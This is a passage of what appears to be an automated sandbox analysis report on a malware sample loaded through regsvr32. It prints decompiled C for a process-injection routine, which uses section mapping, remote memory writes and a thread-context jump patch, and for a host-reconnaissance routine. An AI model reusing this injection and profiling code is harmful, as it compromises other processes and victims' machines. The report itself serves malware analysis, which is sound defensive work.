                                                                                                                                                                        				struct HWND__* _t132;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t154;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				void* _t158;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        
                                                                                                                                                                        				_t81 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                        				_v12 = __ecx;
                                                                                                                                                                        				_t157 = __edx;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                        					E05B9F0DE(0x1f4);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t12 = _t157 + 0x3c; // 0x852c50ff
                                                                                                                                                                        				_t83 =  *_t12 + _t157;
                                                                                                                                                                        				_v28 = _t138;
                                                                                                                                                                        				_v40 = _t83;
                                                                                                                                                                        				if( *_t83 != 0x4550) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					_t158 = _v12;
                                                                                                                                                                        					L15:
                                                                                                                                                                        					if(_v8 != _t138) {
                                                                                                                                                                        						_t90 =  *0x5baf918; // 0x5d5f9f0
                                                                                                                                                                        						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
                                                                                                                                                                        						_v8 = _t138;
                                                                                                                                                                        					}
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                        						_t87 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                        						NtClose(_v20);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v52 =  *((intOrPtr*)(_t83 + 0x50));
                                                                                                                                                                        				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
                                                                                                                                                                        					goto L14;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t97 =  *"18293"; // 0x39323831
                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                        				_t98 =  *0x5bace44; // 0x33
                                                                                                                                                                        				_v32 = _t98;
                                                                                                                                                                        				_v116.lpszClassName =  &_v64;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.lpfnWndProc = DefWindowProcW;
                                                                                                                                                                        				_v116.cbWndExtra = _t138;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.style = 0xb;
                                                                                                                                                                        				_v116.lpszMenuName = _t138;
                                                                                                                                                                        				_v116.cbSize = 0x30;
                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                        				_v116.cbClsExtra = _t138;
                                                                                                                                                                        				_v116.hInstance = _t138;
                                                                                                                                                                        				if(RegisterClassExA( &_v116) != 0) {
                                                                                                                                                                        					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
                                                                                                                                                                        					if(_t132 != 0) {
                                                                                                                                                                        						DestroyWindow(_t132);
                                                                                                                                                                        						UnregisterClassA( &_v64, _t138);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t105 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
                                                                                                                                                                        				_t158 = _v12;
                                                                                                                                                                        				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t154 = E05B98C43( *0x5baf81c, 0x1ac4);
                                                                                                                                                                        					_v36 = _t154;
                                                                                                                                                                        					if(_t154 == 0) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                                                                                        					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                                                                                        					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                                                                                        					E05B98BF4( &_v36, 0x1ac4);
                                                                                                                                                                        					_t119 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t155 =  *0x5baf830; // 0x5b90000
                                                                                                                                                                        					_v36 = _t119;
                                                                                                                                                                        					 *0x5baf830 = _v8;
                                                                                                                                                                        					 *0x5baf81c = _t163;
                                                                                                                                                                        					E05B98CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
                                                                                                                                                                        					E05B9D3C6(_v16, _v8, _v44);
                                                                                                                                                                        					_t124 = E05B9A43D("quatr");
                                                                                                                                                                        					_v53 = _t138;
                                                                                                                                                                        					_t147 = 0xf;
                                                                                                                                                                        					if(_t124 > _t147) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							_t63 = _t138 + 0x41; // 0x41
                                                                                                                                                                        							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
                                                                                                                                                                        							_t138 = _t138 + 1;
                                                                                                                                                                        						} while (_t138 < _t147);
                                                                                                                                                                        						L13:
                                                                                                                                                                        						lstrlenW( &_v68);
                                                                                                                                                                        						 *0x5baf830 = _t155;
                                                                                                                                                                        						 *0x5baf81c = _v36;
                                                                                                                                                                        						goto L17;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t147 = _t124;
                                                                                                                                                                        					if(_t147 == 0) {
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				}
                                                                                                                                                                        			}







































                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL(05B9D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 05B9D4B9
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 05B9D50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 05B9D538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 05B9D543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 05B9D54E
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(05B9D982,00000000), ref: 05B9D579
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(05B9D982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05B9D5A0
                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 05B9D5E6
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 05B9D600
                                                                                                                                                                          • Part of subcall function 05B98BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05B98C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,05B961C5), ref: 05B9D678
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 05B9D6C0
                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 05B9D6D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 494031690-2640591812
                                                                                                                                                                        • Opcode ID: add008d9d9b071ef9e073df41449060b8f04419018a247fc7893307f3b7d55d4
                                                                                                                                                                        • Instruction ID: 71b465406206bf9b455189a6edafee9b217f474281b5d3dd0808c145dece2787
                                                                                                                                                                        • Opcode Fuzzy Hash: add008d9d9b071ef9e073df41449060b8f04419018a247fc7893307f3b7d55d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F810BB5A10219EFDB14DF95D886EEEBBB8FB08304F1441AAF505E7250DB70A941CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 142 5b9d959-5b9d972 call 5b9d218 145 5b9d978-5b9d986 call 5b9d447 142->145 146 5b9da4b-5b9da56 call 5b9d38b 142->146 145->146 151 5b9d98c-5b9d9c3 call 5b98d6d GetThreadContext 145->151 151->146 154 5b9d9c9-5b9da09 NtProtectVirtualMemory 151->154 155 5b9da49 154->155 156 5b9da0b-5b9da26 NtWriteVirtualMemory 154->156 155->146 156->155 157 5b9da28-5b9da47 NtProtectVirtualMemory 156->157 157->146 157->155
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9D959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				intOrPtr _v23;
                                                                                                                                                                        				void _v24;
                                                                                                                                                                        				long _v28;
                                                                                                                                                                        				struct _CONTEXT _v744;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				long _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void** _t65;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __edx;
                                                                                                                                                                        				_t57 = __ecx;
                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                        				if(E05B9D218(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                        					_t33 = E05B9D447( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                        					_t66 = _t33;
                                                                                                                                                                        					if(_t66 != 0) {
                                                                                                                                                                        						E05B98D6D( &_v744, 0, 0x2cc);
                                                                                                                                                                        						_v744.ContextFlags = 0x10002;
                                                                                                                                                                        						if(GetThreadContext(_t65[1],  &_v744) != 0) {
                                                                                                                                                                        							_t62 = _v744.Eax;
                                                                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                                                                        							_v24 = 0xe9;
                                                                                                                                                                        							_t59 = 5;
                                                                                                                                                                        							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
                                                                                                                                                                        							_v8 = _t59;
                                                                                                                                                                        							_v16 = _t62;
                                                                                                                                                                        							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
                                                                                                                                                                        								L6:
                                                                                                                                                                        								_t66 = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v28 = _v28 & 0x00000000;
                                                                                                                                                                        								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                        									goto L6;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E05B9D38B();
                                                                                                                                                                        				return _t66;
                                                                                                                                                                        			}




















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B9D218: LoadLibraryW.KERNEL32 ref: 05B9D312
                                                                                                                                                                          • Part of subcall function 05B9D447: NtCreateSection.NTDLL(05B9D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 05B9D4B9
                                                                                                                                                                          • Part of subcall function 05B9D447: RegisterClassExA.USER32(?), ref: 05B9D50D
                                                                                                                                                                          • Part of subcall function 05B9D447: CreateWindowExA.USER32 ref: 05B9D538
                                                                                                                                                                          • Part of subcall function 05B9D447: DestroyWindow.USER32(00000000), ref: 05B9D543
                                                                                                                                                                          • Part of subcall function 05B9D447: UnregisterClassA.USER32 ref: 05B9D54E
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 05B9D9BB
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05B9DA04
                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 05B9DA21
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 05B9DA42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1578692462-0
                                                                                                                                                                        • Opcode ID: e88e3484f6c27565cbf772028b4abb46bcb7c26efb3199b7f60c61a070a307b2
                                                                                                                                                                        • Instruction ID: e830dc77057876254e274a0c9fa24d45d14b400f712eac80eb93bd4ad64f3f8e
                                                                                                                                                                        • Opcode Fuzzy Hash: e88e3484f6c27565cbf772028b4abb46bcb7c26efb3199b7f60c61a070a307b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A315E76A0010AAFDB15DFA5DC89FEEBBBCEF44200F1041B6E605E3250E730EA558B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E05B9DF3D(void* __fp0) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				union _SID_NAME_USE _v16;
                                                                                                                                                                        				char _v144;
                                                                                                                                                                        				short _v656;
                                                                                                                                                                        				char _v668;
                                                                                                                                                                        				char _v2644;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				void** _t77;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				int _t90;
                                                                                                                                                                        				intOrPtr _t92;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                        				short _t106;
                                                                                                                                                                        				long _t108;
                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                        				intOrPtr _t116;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				intOrPtr _t123;
                                                                                                                                                                        				intOrPtr _t134;
                                                                                                                                                                        				intOrPtr _t136;
                                                                                                                                                                        				intOrPtr _t138;
                                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t148;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				WCHAR* _t150;
                                                                                                                                                                        				char* _t151;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t192;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				WCHAR* _t195;
                                                                                                                                                                        				long _t198;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				char* _t200;
                                                                                                                                                                        				void* _t203;
                                                                                                                                                                        				int* _t204;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        
                                                                                                                                                                        				_t216 = __fp0;
                                                                                                                                                                        				_t148 =  *0x5baf830; // 0x5b90000
                                                                                                                                                                        				_t68 = E05B98BDE(0x1ac4);
                                                                                                                                                                        				_t192 = _t68;
                                                                                                                                                                        				if(_t192 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                        					_t70 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                                                                                        					_t3 = _t192 + 0x648; // 0x648
                                                                                                                                                                        					E05BA3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                                                                                        					_t73 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                                                                                        					_t194 = _t5;
                                                                                                                                                                        					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                                                                                        					_t207 = _t74;
                                                                                                                                                                        					if(_t74 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x1854)) = E05B995F3(_t194, _t207);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t75 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_t77 = E05B9C879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
                                                                                                                                                                        					 *(_t192 + 0x110) = _t77;
                                                                                                                                                                        					_t159 =  *_t77;
                                                                                                                                                                        					if(E05B9C9F4( *_t77) == 0) {
                                                                                                                                                                        						_t79 = E05B9C8C9(_t159, _t194); // executed
                                                                                                                                                                        						__eflags = _t79;
                                                                                                                                                                        						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                                                                                        						__eflags = _t162;
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t14 = _t192 + 0x220; // 0x220, executed
                                                                                                                                                                        					_t80 = E05B9F3A3(_t14); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
                                                                                                                                                                        					_t81 = E05B9F368(_t14); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
                                                                                                                                                                        					_t17 = _t192 + 0x114; // 0x114
                                                                                                                                                                        					_t195 = _t17;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                                                                                        					_v12 = 0x80;
                                                                                                                                                                        					_v8 = 0x100;
                                                                                                                                                                        					if(LookupAccountSidW(0,  *( *(_t192 + 0x110)), _t195,  &_v12,  &_v656,  &_v8,  &_v16) == 0) {
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        					}
                                                                                                                                                                        					_t90 = GetSystemMetrics(0x1000);
                                                                                                                                                                        					_t28 = _t192 + 0x228; // 0x228
                                                                                                                                                                        					_t149 = _t28;
                                                                                                                                                                        					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                                                                                        					E05B9DF36(_t149); // executed
                                                                                                                                                                        					_t211 = _t149;
                                                                                                                                                                        					if(_t149 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x434)) = E05B995F3(_t149, _t211);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t92 = E05B9C6CE();
                                                                                                                                                                        					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                                                                                        					_t196 = _t33;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                                                                                        					_t93 = E05B9C4C1(_t92, _t33, _t211, _t216);
                                                                                                                                                                        					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                                                                                        					E05B999DF(_t93, _t33, _t35);
                                                                                                                                                                        					_t36 = _t192 + 0x438; // 0x438
                                                                                                                                                                        					E05B9960D(_t149, _t36);
                                                                                                                                                                        					_t97 = E05B9E2C5(_t196, E05B9A43D(_t33), 0);
                                                                                                                                                                        					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E05B9C6E4(_t97, _t37, _t216);
                                                                                                                                                                        					_t99 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_t101 = E05B9CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
                                                                                                                                                                        					E05B98D6D(_t192, 0, 0x9c);
                                                                                                                                                                        					_t204 = _t203 + 0xc;
                                                                                                                                                                        					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                        					GetVersionExA(_t192);
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xa8)) = E05B9DD39(_t100);
                                                                                                                                                                        					_t106 = E05B9DD62(_t105);
                                                                                                                                                                        					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                                                                                        					_t150 = _t41;
                                                                                                                                                                        					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                                                                                        					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                                                                                        					_t108 = E05B99DF2(_t105, 0x9cf);
                                                                                                                                                                        					_t177 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_t198 = _t108;
                                                                                                                                                                        					 *_t204 = 0x104;
                                                                                                                                                                        					_push( &_v668);
                                                                                                                                                                        					_push(_t198);
                                                                                                                                                                        					_v8 = _t198;
                                                                                                                                                                        					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                                                                                        						_t143 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                                                                                        					}
                                                                                                                                                                        					E05B98BAF( &_v8);
                                                                                                                                                                        					_t113 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                                                                                        					_t199 = _t48;
                                                                                                                                                                        					 *_t204 = 0x209;
                                                                                                                                                                        					_push(_t199);
                                                                                                                                                                        					_push(L"USERPROFILE");
                                                                                                                                                                        					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                                                                                        						E05B99E51(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                                                                                        						_t141 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						_t204 =  &(_t204[5]);
                                                                                                                                                                        						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x20a);
                                                                                                                                                                        					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                                                                                        					_t151 = L"TEMP";
                                                                                                                                                                        					_t116 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_push(_t151);
                                                                                                                                                                        					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                                                                                        						_t138 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x40);
                                                                                                                                                                        					_t200 = L"SystemDrive";
                                                                                                                                                                        					_push( &_v144);
                                                                                                                                                                        					_t119 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					_push(_t200);
                                                                                                                                                                        					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                        						_t136 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                                                        					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                        					_t123 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                        					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E05BA3548(E05B9E2C5(_t62, E05B9A43D(_t62), 0),  &_v2644);
                                                                                                                                                                        					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                        					E05BA351A( &_v2644, _t63, 0x20);
                                                                                                                                                                        					_push( &_v2644);
                                                                                                                                                                        					_push(0x1e);
                                                                                                                                                                        					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                        					_t191 = 0x14;
                                                                                                                                                                        					E05B996DA(_t66, _t191);
                                                                                                                                                                        					_t134 = E05B9DAE3(_t191); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
                                                                                                                                                                        					return _t192;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t68;
                                                                                                                                                                        			}


                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 05B9DF64
                                                                                                                                                                        • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 05B9E057
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 05B9E05E
                                                                                                                                                                        • GetSystemMetrics.USER32(00001000), ref: 05B9E06E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 05B9E123
                                                                                                                                                                          • Part of subcall function 05B9C8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05B90000), ref: 05B9C96D
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 05B9E14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AccountAllocateChangeCloseCurrentDirectoryErrorFindHeapLastLookupMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 377074508-2706916422
                                                                                                                                                                        • Opcode ID: 47000b7f1c8c65a9121b3fc09b87402233c1548554b53d7b6a9adf703b255997
                                                                                                                                                                        • Instruction ID: a3090d2e613ecb406f561fb37b055f9985d449bff850117ff0ee280ae4e3f286
                                                                                                                                                                        • Opcode Fuzzy Hash: 47000b7f1c8c65a9121b3fc09b87402233c1548554b53d7b6a9adf703b255997
                                                                                                                                                                        • Instruction Fuzzy Hash: AD915C75700605AFDB08EB74D84AFEABBE8FF09300F0041BAF51997241DB74B9558BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E05B9C5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				short _v528;
                                                                                                                                                                        				short _v1040;
                                                                                                                                                                        				short _v1552;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				WCHAR* _t27;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				long _t38;
                                                                                                                                                                        				WCHAR* _t43;
                                                                                                                                                                        				WCHAR* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_t44 = __ecx;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                        				_t56 = __ecx;
                                                                                                                                                                        				E05B98D6D(__edx, 0, 0x100);
                                                                                                                                                                        				_v12 = 0x100;
                                                                                                                                                                        				_t23 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                        				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                        				_t27 = E05B99DF2(_t44, 0xad6);
                                                                                                                                                                        				_v16 = _t27;
                                                                                                                                                                        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				_v8 = _v8 &  ~_t29;
                                                                                                                                                                        				E05B98BAF( &_v16);
                                                                                                                                                                        				_t33 = E05B9A456(_t43);
